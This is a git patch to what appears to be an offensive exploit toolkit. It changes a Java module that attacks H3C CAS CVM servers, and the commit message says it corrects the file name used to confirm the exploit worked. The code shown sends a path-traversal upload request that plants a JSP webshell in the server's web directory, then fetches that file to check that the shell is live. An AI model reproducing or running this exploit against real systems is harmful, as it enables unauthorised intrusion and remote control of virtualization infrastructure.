From ec1492c753ee2acbbed3ad105b64c031993c25b0 Mon Sep 17 00:00:00 2001
From: dbgee <46910972+dbgee@users.noreply.github.com>
Date: Thu, 23 Mar 2023 10:01:29 +0800
Subject: [PATCH] =?UTF-8?q?Update=20cas=5Fcvm=5Fupload.java=20=E6=96=87?=
 =?UTF-8?q?=E4=BB=B6=E5=90=8D=E6=A0=A1=E9=AA=8C?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

校验漏洞是否利用成功的文件名错误
---
 src/main/java/exp/equipment/h3c/cas_cvm_upload.java | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/main/java/exp/equipment/h3c/cas_cvm_upload.java b/src/main/java/exp/equipment/h3c/cas_cvm_upload.java
index 4d66daf..f681360 100644
--- a/src/main/java/exp/equipment/h3c/cas_cvm_upload.java
+++ b/src/main/java/exp/equipment/h3c/cas_cvm_upload.java
@@ -56,7 +56,7 @@ private boolean shell(String url,TextArea textArea){
 
         Response post = HttpTools.post(url + "/cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/nishizhu.jsp&name=222", payload, head, "utf-8");
 
-        Response response = HttpTools.get(url + "/cas/js/lib/buttons/nishizhu.txt", new HashMap<String, String>(), "utf-8");
+        Response response = HttpTools.get(url + "/cas/js/lib/buttons/nishizhu.jsp", new HashMap<String, String>(), "utf-8");
         if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
             Platform.runLater(() -> {
                 textArea.appendText(